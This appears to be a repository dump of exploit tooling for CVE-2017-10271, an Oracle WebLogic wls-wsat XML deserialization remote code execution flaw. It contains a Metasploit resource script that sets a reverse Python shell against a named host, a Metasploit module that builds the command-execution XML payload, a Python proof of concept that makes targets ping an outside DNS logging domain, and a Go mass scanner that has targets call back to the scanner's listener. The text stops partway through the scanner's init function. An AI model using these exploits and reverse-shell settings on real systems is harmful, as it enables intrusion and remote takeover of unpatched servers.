-------------------------------------------------------------------------------- 1 | use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce 2 | set RHOST pwned.com 3 | set TARGET 1 4 | set PAYLOAD cmd/unix/reverse_python 5 | set LHOST eth0 6 | set LPORT 4444 7 | exploit 8 | -------------------------------------------------------------------------------- /CVE-2017-10271/oracle_weblog_wsat_rce.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: https://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = ExcellentRanking 8 | 9 | include Msf::Exploit::Remote::HttpClient 10 | # include Msf::Exploit::Remote::HttpServer 11 | 12 | def initialize(info = {}) 13 | super( 14 | update_info( 15 | info, 16 | 'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', 17 | 'Description' => %q( 18 | The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization 19 | remote code execution vulnerability. Supported versions that are affected are 20 | 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin 21 | of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, 22 | HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check 23 | and will not be used when executing the exploit itself. 
24 | ), 25 | 'License' => MSF_LICENSE, 26 | 'Author' => [ 27 | 'Kevin Kirsche ', # Metasploit module 28 | 'Luffin', # Proof of Concept 29 | 'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery 30 | ], 31 | 'References' => 32 | [ 33 | ['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin 34 | ['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept 35 | ['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit 36 | ['CVE', '2017-10271'], 37 | ['EDB', '43458'] 38 | ], 39 | 'Platform' => %w{ win unix }, 40 | 'Arch' => [ ARCH_CMD ], 41 | 'Targets' => 42 | [ 43 | [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], 44 | [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] 45 | ], 46 | 'DisclosureDate' => "Oct 19 2017", 47 | # Note that this is by index, rather than name. It's generally easiest 48 | # just to put the default at the beginning of the list and skip this 49 | # entirely. 
50 | 'DefaultTarget' => 0 51 | ) 52 | ) 53 | 54 | register_options([ 55 | OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), 56 | OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]), 57 | OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]), 58 | # OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) 59 | ]) 60 | end 61 | 62 | def cmd_base 63 | if target['Platform'] == 'win' 64 | return 'cmd' 65 | else 66 | return '/bin/sh' 67 | end 68 | end 69 | 70 | def cmd_opt 71 | if target['Platform'] == 'win' 72 | return '/c' 73 | else 74 | return '-c' 75 | end 76 | end 77 | 78 | 79 | # 80 | # This generates a XML payload that will execute the desired payload on the RHOST 81 | # 82 | def exploit_process_builder_payload 83 | # Generate a payload which will execute on a *nix machine using /bin/sh 84 | xml = %Q{ 85 | 86 | 87 | 88 | 89 | 90 | 91 | #{cmd_base} 92 | 93 | 94 | #{cmd_opt} 95 | 96 | 97 | #{payload.encoded.encode(xml: :text)} 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | } 107 | end 108 | 109 | # 110 | # This builds a XML payload that will generate a HTTP GET request to our SRVHOST 111 | # from the target machine. 112 | # 113 | def check_process_builder_payload 114 | xml = %Q{ 115 | 116 | 117 | 118 | 119 | #{get_uri.encode(xml: :text)} 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | } 129 | end 130 | 131 | # 132 | # In the event that a 'check' host responds, we should respond randomly so that we don't clog up 133 | # the logs too much with a no response error or similar. 134 | # 135 | def on_request_uri(cli, request) 136 | random_content = '

'+Rex::Text.rand_text_alphanumeric(20)+'

' 137 | send_response(cli, random_content) 138 | 139 | @received_request = true 140 | end 141 | 142 | # 143 | # The exploit method connects to the remote service and sends a randomly generated string 144 | # encapsulated within a SOAP XML body. This will start an HTTP server for us to receive 145 | # the response from. This is based off of the exploit technique from 146 | # exploits/windows/novell/netiq_pum_eval.rb 147 | # 148 | # This doesn't work as is because MSF cannot mix HttpServer and HttpClient 149 | # at the time of authoring this 150 | # 151 | # def check 152 | # start_service 153 | # 154 | # print_status('Sending the check payload...') 155 | # res = send_request_cgi({ 156 | # 'method' => 'POST', 157 | # 'uri' => normalize_uri(target_uri.path), 158 | # 'data' => check_process_builder_payload, 159 | # 'ctype' => 'text/xml;charset=UTF-8' 160 | # }, datastore['TIMEOUT']) 161 | # 162 | # print_status("Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...") 163 | # 164 | # waited = 0 165 | # until @received_request 166 | # sleep 1 167 | # waited += 1 168 | # if waited > datastore['HTTP_DELAY'] 169 | # stop_service 170 | # return Exploit::CheckCode::Safe 171 | # end 172 | # end 173 | # 174 | # stop_service 175 | # return Exploit::CheckCode::Vulnerable 176 | # end 177 | 178 | # 179 | # The exploit method connects to the remote service and sends the specified payload 180 | # encapsulated within a SOAP XML body. 
181 | # 182 | def exploit 183 | send_request_cgi({ 184 | 'method' => 'POST', 185 | 'uri' => normalize_uri(target_uri.path), 186 | 'data' => exploit_process_builder_payload, 187 | 'ctype' => 'text/xml;charset=UTF-8' 188 | }, datastore['TIMEOUT']) 189 | end 190 | end 191 | -------------------------------------------------------------------------------- /CVE-2017-10271/original-poc/original-poc.py: -------------------------------------------------------------------------------- 1 | 2 | #coding=utf8 3 | import sys 4 | import requests 5 | import random 6 | from string import letters 7 | 8 | 9 | class Exploit: 10 | 11 | def __init__(self, url): 12 | self.url = url if not url.endswith('/') else url.strip('/') 13 | self.API = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' 14 | self.domain = 'xxxxxx.ceye.io' 15 | self.BANNER = ''.join([random.choice(letters) for i in range(6)]) 16 | self.API_URL = 'http://api.ceye.io/v1/records?token={}&type=dns&filter={}'.format(self.API, self.BANNER) 17 | 18 | def run(self): 19 | self.post(self.get_linux_payload()) 20 | self.post(self.get_windows_payload()) 21 | 22 | def post(self, data): 23 | headers = { 24 | "Content-Type": "text/xml;charset=UTF-8", 25 | "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50" 26 | } 27 | payload = "/wls-wsat/CoordinatorPortType" 28 | 29 | vulnurl = self.url + payload 30 | try: 31 | req = requests.post(vulnurl, data=data, headers=headers, timeout=10, verify=False) 32 | except Exception: 33 | print "[-] Connection Error" 34 | 35 | if self.confirm_sucess(): 36 | print "[!] 
%s is vuln" % vulnurl 37 | sys.exit(0) 38 | 39 | def get_windows_payload(self): 40 | windows_post_data = ''' 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | cmd 49 | 50 | 51 | /c 52 | 53 | 54 | ping {}.{} 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | ''' 65 | return windows_post_data.format(self.BANNER, self.domain) 66 | 67 | def get_linux_payload(self): 68 | linux_post_data = ''' 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | /bin/sh 77 | 78 | 79 | -c 80 | 81 | 82 | ping {}.{} 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | ''' 93 | return linux_post_data.format(self.BANNER, self.domain) 94 | 95 | def confirm_sucess(self): 96 | req = requests.get(self.API_URL) 97 | d = req.json() 98 | try: 99 | name = d['data'][0]['name'] 100 | # print self.BANNER 101 | # print name 102 | if self.BANNER in name: 103 | return True 104 | except Exception: 105 | return False 106 | 107 | 108 | if __name__ == "__main__": 109 | if len(sys.argv) < 2: 110 | print 'Usage: python %s url' % sys.argv[0] 111 | sys.exit(0) 112 | 113 | exploit = Exploit(sys.argv[1]) 114 | exploit.run() 115 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/LICENSE: -------------------------------------------------------------------------------- 1 | 2 | Apache License 3 | Version 2.0, January 2004 4 | http://www.apache.org/licenses/ 5 | 6 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 7 | 8 | 1. Definitions. 9 | 10 | "License" shall mean the terms and conditions for use, reproduction, 11 | and distribution as defined by Sections 1 through 9 of this document. 12 | 13 | "Licensor" shall mean the copyright owner or entity authorized by 14 | the copyright owner that is granting the License. 15 | 16 | "Legal Entity" shall mean the union of the acting entity and all 17 | other entities that control, are controlled by, or are under common 18 | control with that entity. 
For the purposes of this definition, 19 | "control" means (i) the power, direct or indirect, to cause the 20 | direction or management of such entity, whether by contract or 21 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 22 | outstanding shares, or (iii) beneficial ownership of such entity. 23 | 24 | "You" (or "Your") shall mean an individual or Legal Entity 25 | exercising permissions granted by this License. 26 | 27 | "Source" form shall mean the preferred form for making modifications, 28 | including but not limited to software source code, documentation 29 | source, and configuration files. 30 | 31 | "Object" form shall mean any form resulting from mechanical 32 | transformation or translation of a Source form, including but 33 | not limited to compiled object code, generated documentation, 34 | and conversions to other media types. 35 | 36 | "Work" shall mean the work of authorship, whether in Source or 37 | Object form, made available under the License, as indicated by a 38 | copyright notice that is included in or attached to the work 39 | (an example is provided in the Appendix below). 40 | 41 | "Derivative Works" shall mean any work, whether in Source or Object 42 | form, that is based on (or derived from) the Work and for which the 43 | editorial revisions, annotations, elaborations, or other modifications 44 | represent, as a whole, an original work of authorship. For the purposes 45 | of this License, Derivative Works shall not include works that remain 46 | separable from, or merely link (or bind by name) to the interfaces of, 47 | the Work and Derivative Works thereof. 
48 | 49 | "Contribution" shall mean any work of authorship, including 50 | the original version of the Work and any modifications or additions 51 | to that Work or Derivative Works thereof, that is intentionally 52 | submitted to Licensor for inclusion in the Work by the copyright owner 53 | or by an individual or Legal Entity authorized to submit on behalf of 54 | the copyright owner. For the purposes of this definition, "submitted" 55 | means any form of electronic, verbal, or written communication sent 56 | to the Licensor or its representatives, including but not limited to 57 | communication on electronic mailing lists, source code control systems, 58 | and issue tracking systems that are managed by, or on behalf of, the 59 | Licensor for the purpose of discussing and improving the Work, but 60 | excluding communication that is conspicuously marked or otherwise 61 | designated in writing by the copyright owner as "Not a Contribution." 62 | 63 | "Contributor" shall mean Licensor and any individual or Legal Entity 64 | on behalf of whom a Contribution has been received by Licensor and 65 | subsequently incorporated within the Work. 66 | 67 | 2. Grant of Copyright License. Subject to the terms and conditions of 68 | this License, each Contributor hereby grants to You a perpetual, 69 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 70 | copyright license to reproduce, prepare Derivative Works of, 71 | publicly display, publicly perform, sublicense, and distribute the 72 | Work and such Derivative Works in Source or Object form. 73 | 74 | 3. Grant of Patent License. 
Subject to the terms and conditions of 75 | this License, each Contributor hereby grants to You a perpetual, 76 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 77 | (except as stated in this section) patent license to make, have made, 78 | use, offer to sell, sell, import, and otherwise transfer the Work, 79 | where such license applies only to those patent claims licensable 80 | by such Contributor that are necessarily infringed by their 81 | Contribution(s) alone or by combination of their Contribution(s) 82 | with the Work to which such Contribution(s) was submitted. If You 83 | institute patent litigation against any entity (including a 84 | cross-claim or counterclaim in a lawsuit) alleging that the Work 85 | or a Contribution incorporated within the Work constitutes direct 86 | or contributory patent infringement, then any patent licenses 87 | granted to You under this License for that Work shall terminate 88 | as of the date such litigation is filed. 89 | 90 | 4. Redistribution. 
You may reproduce and distribute copies of the 91 | Work or Derivative Works thereof in any medium, with or without 92 | modifications, and in Source or Object form, provided that You 93 | meet the following conditions: 94 | 95 | (a) You must give any other recipients of the Work or 96 | Derivative Works a copy of this License; and 97 | 98 | (b) You must cause any modified files to carry prominent notices 99 | stating that You changed the files; and 100 | 101 | (c) You must retain, in the Source form of any Derivative Works 102 | that You distribute, all copyright, patent, trademark, and 103 | attribution notices from the Source form of the Work, 104 | excluding those notices that do not pertain to any part of 105 | the Derivative Works; and 106 | 107 | (d) If the Work includes a "NOTICE" text file as part of its 108 | distribution, then any Derivative Works that You distribute must 109 | include a readable copy of the attribution notices contained 110 | within such NOTICE file, excluding those notices that do not 111 | pertain to any part of the Derivative Works, in at least one 112 | of the following places: within a NOTICE text file distributed 113 | as part of the Derivative Works; within the Source form or 114 | documentation, if provided along with the Derivative Works; or, 115 | within a display generated by the Derivative Works, if and 116 | wherever such third-party notices normally appear. The contents 117 | of the NOTICE file are for informational purposes only and 118 | do not modify the License. You may add Your own attribution 119 | notices within Derivative Works that You distribute, alongside 120 | or as an addendum to the NOTICE text from the Work, provided 121 | that such additional attribution notices cannot be construed 122 | as modifying the License. 
123 | 124 | You may add Your own copyright statement to Your modifications and 125 | may provide additional or different license terms and conditions 126 | for use, reproduction, or distribution of Your modifications, or 127 | for any such Derivative Works as a whole, provided Your use, 128 | reproduction, and distribution of the Work otherwise complies with 129 | the conditions stated in this License. 130 | 131 | 5. Submission of Contributions. Unless You explicitly state otherwise, 132 | any Contribution intentionally submitted for inclusion in the Work 133 | by You to the Licensor shall be under the terms and conditions of 134 | this License, without any additional terms or conditions. 135 | Notwithstanding the above, nothing herein shall supersede or modify 136 | the terms of any separate license agreement you may have executed 137 | with Licensor regarding such Contributions. 138 | 139 | 6. Trademarks. This License does not grant permission to use the trade 140 | names, trademarks, service marks, or product names of the Licensor, 141 | except as required for reasonable and customary use in describing the 142 | origin of the Work and reproducing the content of the NOTICE file. 143 | 144 | 7. Disclaimer of Warranty. Unless required by applicable law or 145 | agreed to in writing, Licensor provides the Work (and each 146 | Contributor provides its Contributions) on an "AS IS" BASIS, 147 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 148 | implied, including, without limitation, any warranties or conditions 149 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 150 | PARTICULAR PURPOSE. You are solely responsible for determining the 151 | appropriateness of using or redistributing the Work and assume any 152 | risks associated with Your exercise of permissions under this License. 153 | 154 | 8. Limitation of Liability. 
In no event and under no legal theory, 155 | whether in tort (including negligence), contract, or otherwise, 156 | unless required by applicable law (such as deliberate and grossly 157 | negligent acts) or agreed to in writing, shall any Contributor be 158 | liable to You for damages, including any direct, indirect, special, 159 | incidental, or consequential damages of any character arising as a 160 | result of this License or out of the use or inability to use the 161 | Work (including but not limited to damages for loss of goodwill, 162 | work stoppage, computer failure or malfunction, or any and all 163 | other commercial damages or losses), even if such Contributor 164 | has been advised of the possibility of such damages. 165 | 166 | 9. Accepting Warranty or Additional Liability. While redistributing 167 | the Work or Derivative Works thereof, You may choose to offer, 168 | and charge a fee for, acceptance of support, warranty, indemnity, 169 | or other liability obligations and/or rights consistent with this 170 | License. However, in accepting such obligations, You may act only 171 | on Your own behalf and on Your sole responsibility, not on behalf 172 | of any other Contributor, and only if You agree to indemnify, 173 | defend, and hold each Contributor harmless for any liability 174 | incurred by, or claims asserted against, such Contributor by reason 175 | of your accepting any such warranty or additional liability. 176 | 177 | END OF TERMS AND CONDITIONS 178 | 179 | APPENDIX: How to apply the Apache License to your work. 180 | 181 | To apply the Apache License to your work, attach the following 182 | boilerplate notice, with the fields enclosed by brackets "[]" 183 | replaced with your own identifying information. (Don't include 184 | the brackets!) The text should be enclosed in the appropriate 185 | comment syntax for the file format. 
We also recommend that a 186 | file or class name and description of purpose be included on the 187 | same "printed page" as the copyright notice for easier 188 | identification within third-party archives. 189 | 190 | Copyright [yyyy] [name of copyright owner] 191 | 192 | Licensed under the Apache License, Version 2.0 (the "License"); 193 | you may not use this file except in compliance with the License. 194 | You may obtain a copy of the License at 195 | 196 | http://www.apache.org/licenses/LICENSE-2.0 197 | 198 | Unless required by applicable law or agreed to in writing, software 199 | distributed under the License is distributed on an "AS IS" BASIS, 200 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 201 | See the License for the specific language governing permissions and 202 | limitations under the License. 203 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/Makefile: -------------------------------------------------------------------------------- 1 | BINARY=CVE-2017-10271 2 | GOARCH=amd64 3 | HASH=$(shell git rev-parse HEAD) 4 | BUILDDATE=$(shell date -u '+%Y-%m-%dT%k:%M:%SZ') 5 | GOVERSION=$(shell go version | sed -e 's/ /|^|/g') 6 | VERSION=1.5.1 7 | LDFLAGS=-ldflags "-s -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildHash=$(HASH) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildTime=$(BUILDDATE) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildVersion=$(VERSION) -X github.com/kkirsche/$(BINARY)/scanners/cmd.BuildGoVersion=$(GOVERSION)" 8 | 9 | lint: 10 | golint ./... 11 | 12 | vet: 13 | go vet ./... 
14 | 15 | clean: 16 | rm -rf bin 17 | 18 | install: 19 | go install -race -v 20 | 21 | binary-depends: 22 | mkdir -p bin 23 | 24 | # Builds 25 | darwin-build: vet lint binary-depends 26 | env GOOS=darwin GOARCH=$(GOARCH) go build $(LDFLAGS) -race -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).darwin 27 | 28 | dragonfly-build: vet lint binary-depends 29 | env GOOS=dragonfly GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).dragonfly 30 | 31 | freebsd-build: vet lint binary-depends 32 | env GOOS=freebsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).freebsd 33 | 34 | linux-build: vet lint binary-depends 35 | env GOOS=linux GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).linux 36 | 37 | netbsd-build: vet lint binary-depends 38 | env GOOS=netbsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).netbsd 39 | 40 | openbsd-build: vet lint binary-depends 41 | env GOOS=openbsd GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).openbsd 42 | 43 | solaris-build: vet lint binary-depends 44 | env GOOS=solaris GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).solaris 45 | 46 | windows-build: vet lint binary-depends 47 | env GOOS=windows GOARCH=$(GOARCH) go build $(LDFLAGS) -v -o bin/$(BINARY).release.$(VERSION).$(GOARCH).windows.exe 48 | 49 | build: darwin-build dragonfly-build freebsd-build linux-build netbsd-build openbsd-build solaris-build windows-build 50 | 51 | .PHONY: vet install binary-depends lint 52 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/README.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-10271 Vulnerability Scanner 2 | 3 | 4 | Weblogic wls-wsat Component Deserialization Vulnerability (CVE-2017-10271) Detection Executable 5 | 6 | 
### Usage 7 | 8 | ``` 9 | ~/g/p/C/scanners ❯❯❯ ./bin/CVE-2017-10271.release.1.5.0.amd64.darwin -h 10 | A purpose built scanner for detecting CVE-2017-10271. Starts a web 11 | server on the LPORT and then logs any host which contacts it, as they are 12 | vulnerable. 13 | 14 | Example usage: 15 | ./CVE-2017-10271.release.1.5.0.amd64.linux -s "10.10.10.10" -t "$(pwd)/targets.txt" -o output_file.txt -v --all-urls 16 | 17 | Example targets.txt: 18 | http://pwned.com:7001/ 19 | https://pwnedalso.com:8002/ 20 | 21 | Usage: 22 | cve-2017-10271 [flags] 23 | cve-2017-10271 [command] 24 | 25 | Available Commands: 26 | help Help about any command 27 | version The version of the binary 28 | 29 | Flags: 30 | -u, --all-urls Check for all possible vulnerable URL suffixes 31 | -h, --help help for cve-2017-10271 32 | -s, --listening-host string The IP of this machine's public interface 33 | -l, --listening-port int The port to listen for vulnerable responses (default 4444) 34 | -o, --output-file string File to output results to 35 | -t, --target-file string File with list of targets in http(s)://HOSTNAME:PORT format 36 | -a, --threads int Number of threads to use while scanning (default 10) 37 | -v, --verbose Enable verbose mode (Print who is being scanned) 38 | -w, --wait-time int Seconds to wait after we complete sending payloads (default 20) 39 | 40 | Use "cve-2017-10271 [command] --help" for more information about a command. 
41 | ``` 42 | -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.darwin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.darwin -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.dragonfly: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.dragonfly -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.freebsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.freebsd -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.linux: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.linux -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.netbsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.netbsd 
-------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.openbsd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.openbsd -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.solaris: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.solaris -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.windows.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TuuuNya/Exploit/16476a97194ec5874b407e1b6b20351aa7988c93/CVE-2017-10271/scanners/bin/CVE-2017-10271.release.1.5.1.amd64.windows.exe -------------------------------------------------------------------------------- /CVE-2017-10271/scanners/cmd/root.go: -------------------------------------------------------------------------------- 1 | // Copyright © 2018 Kevin Kirsche 2 | // 3 | // Licensed under the Apache License, Version 2.0 (the "License"); 4 | // you may not use this file except in compliance with the License. 5 | // You may obtain a copy of the License at 6 | // 7 | // http://www.apache.org/licenses/LICENSE-2.0 8 | // 9 | // Unless required by applicable law or agreed to in writing, software 10 | // distributed under the License is distributed on an "AS IS" BASIS, 11 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
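// See the License for the specific language governing permissions and
// limitations under the License.

package cmd

import (
	"bufio"
	"fmt"
	"net"
	"net/http"
	"net/url"
	"os"
	"strings"
	"sync"
	"time"

	"github.com/kkirsche/CVE-2017-10271/scanners/libcve201710271"
	"github.com/sirupsen/logrus"
	"github.com/spf13/cobra"
)

// callbackReadHeaderTimeout bounds how long the callback listener waits for a
// client to finish sending its request headers, so one stalled connection
// cannot pin a listener goroutine for the whole scan.
const callbackReadHeaderTimeout = 10 * time.Second

var (
	// config receives the values bound to the command-line flags in init().
	config libcve201710271.Config
)

// RootCmd represents the base command when called without any subcommands
var RootCmd = &cobra.Command{
	Use:   "cve-2017-10271",
	Short: "Scan for the CVE-2017-10271 vulnerability",
	Long: fmt.Sprintf(`A purpose built scanner for detecting CVE-2017-10271. Starts a web
server on the LPORT and then logs any host which contacts it, as they are
vulnerable.

Example usage:
./CVE-2017-10271.release.%s.amd64.linux -s "10.10.10.10" -t "$(pwd)/targets.txt" -o output_file.txt -v --all-urls

Example targets.txt:
http://pwned.com:7001/
https://pwnedalso.com:8002/
`, BuildVersion),
	Run: runScan,
}

// runScan is the body of RootCmd. It validates the flag values, binds the
// callback listener, hands every target/URL pair to the libcve201710271
// workers over targetCh, and then waits WaitTime seconds for late callbacks.
// The cobra parameters are unused: all input comes from the package-level
// config populated in init().
func runScan(cmd *cobra.Command, args []string) {
	if config.Verbose {
		logrus.SetLevel(logrus.InfoLevel)
	} else {
		logrus.SetLevel(logrus.WarnLevel)
	}

	if config.Lport < 1 || config.Lport > 65535 {
		logrus.Errorln("Listening port must be greater than 0 and less than 65536. Exiting...")
		return
	}

	if config.Lhost == "" {
		logrus.Errorln("Listening host IP address or hostname is required. Exiting...")
		return
	}

	if config.TargetFile == "" {
		logrus.Errorln("Target file is required. Exiting...")
		return
	}

	// With zero workers nobody ever receives from targetCh and the first
	// send below blocks forever, so reject that configuration up front.
	if config.Threads < 1 {
		logrus.Errorln("Number of threads must be at least 1. Exiting...")
		return
	}

	if config.OutputFile != "" {
		// 0644 rather than 0755: a results log has no business being
		// executable. O_APPEND so a re-run adds to, rather than partially
		// overwrites, an earlier results file.
		out, err := os.OpenFile(config.OutputFile, os.O_WRONLY|os.O_CREATE|os.O_APPEND, 0644)
		if err != nil {
			// Previously execution fell through and handed logrus a nil
			// writer, which panics on the first log line; stop instead.
			logrus.WithError(err).Errorln("Failed to open file for writing. Exiting...")
			return
		}
		defer out.Close()
		logrus.SetOutput(out)
	}

	libcve201710271.Banner(config)

	logrus.Infof("Starting webserver on port %d to catch vulnerable hosts", config.Lport)
	// Bind synchronously: if the port cannot be opened (in use, no privilege)
	// every target would otherwise silently appear "not vulnerable" because
	// no callback could ever reach us.
	ln, err := net.Listen("tcp", fmt.Sprintf(":%d", config.Lport))
	if err != nil {
		logrus.WithError(err).Errorln("Failed to bind the callback listener. Exiting...")
		return
	}
	mux := http.NewServeMux()
	mux.HandleFunc("/cve-2017-10271", vulnHandler)
	srv := &http.Server{
		Handler:           vulnLog(mux),
		ReadHeaderTimeout: callbackReadHeaderTimeout,
	}
	go func() {
		if err := srv.Serve(ln); err != nil && err != http.ErrServerClosed {
			logrus.WithError(err).Errorln("Callback webserver stopped; results may be incomplete")
		}
	}()

	f, err := os.Open(config.TargetFile)
	if err != nil {
		logrus.WithError(err).Errorln("Failed to open target file.")
		return
	}
	defer f.Close()

	targetCh := make(chan libcve201710271.TargetHost)

	m := &sync.Mutex{}
	for w := 1; w <= config.Threads; w++ {
		go libcve201710271.Worker(w, m, targetCh)
	}

	// The URL list does not change per target; pick it once.
	urls := libcve201710271.DefaultURLs
	if config.AllURLs {
		urls = libcve201710271.AllURLs
	}

	scanner := bufio.NewScanner(f)
	for scanner.Scan() {
		rhost := strings.TrimRight(strings.TrimSpace(scanner.Text()), "/")
		if rhost == "" {
			continue // a blank line in targets.txt is not a host
		}

		// Loop variable renamed from "url" so it no longer shadows net/url.
		for _, u := range urls {
			xmlPayload := libcve201710271.GenerateCheckPayload(config.Lhost, config.Lport, rhost, u)
			targetCh <- libcve201710271.TargetHost{
				R: rhost,
				P: xmlPayload,
				U: u,
			}
		}
	}
	close(targetCh)

	if err := scanner.Err(); err != nil {
		logrus.Fatal(err)
	}

	// The message now reports the configured wait instead of a fixed "10".
	logrus.Infof("Sleeping for %d seconds in case we have any stragglers...", config.WaitTime)
	time.Sleep(time.Duration(config.WaitTime) * time.Second)
}

// vulnLog wraps handler so that every request reaching the callback listener
// is recorded as a vulnerable host (to stdout as well when an output file is
// in use, since logrus is then writing to that file) before being served.
func vulnLog(handler http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		// Query() already percent-decodes once; the extra pass is kept for
		// callers that double-encode "target", falling back to the raw
		// value instead of logging an empty string on a decode error.
		raw := r.URL.Query().Get("target")
		t, err := url.QueryUnescape(raw)
		if err != nil {
			t = raw
		}
		// %q: "target" is whatever the remote side chose to send, so quote
		// it rather than let embedded newlines forge extra result lines.
		if config.OutputFile != "" {
			fmt.Printf("[VULNERABLE] Remote Address: %s | From Target: %q | Method: %s\n", r.RemoteAddr, t, r.Method)
		}
		logrus.Warnf("[VULNERABLE] Remote Address: %s | From Target: %q | Method: %s", r.RemoteAddr, t, r.Method)
		handler.ServeHTTP(w, r)
	})
}

// vulnHandler answers every request on the callback path with a fixed
// notice; the request itself has already been logged by vulnLog.
func vulnHandler(w http.ResponseWriter, r *http.Request) {
	fmt.Fprint(w, "WARNING! You are vulnerable to CVE-2017-10271")
}

// Execute adds all child commands to the root command and sets flags appropriately.
// This is called by main.main(). It only needs to happen once to the rootCmd.
func Execute() {
	if err := RootCmd.Execute(); err != nil {
		fmt.Println(err)
		os.Exit(1)
	}
}

// init binds the command-line flags to the package-level config.
func init() {
	// Cobra also supports local flags, which will only run
	// when this action is called directly.
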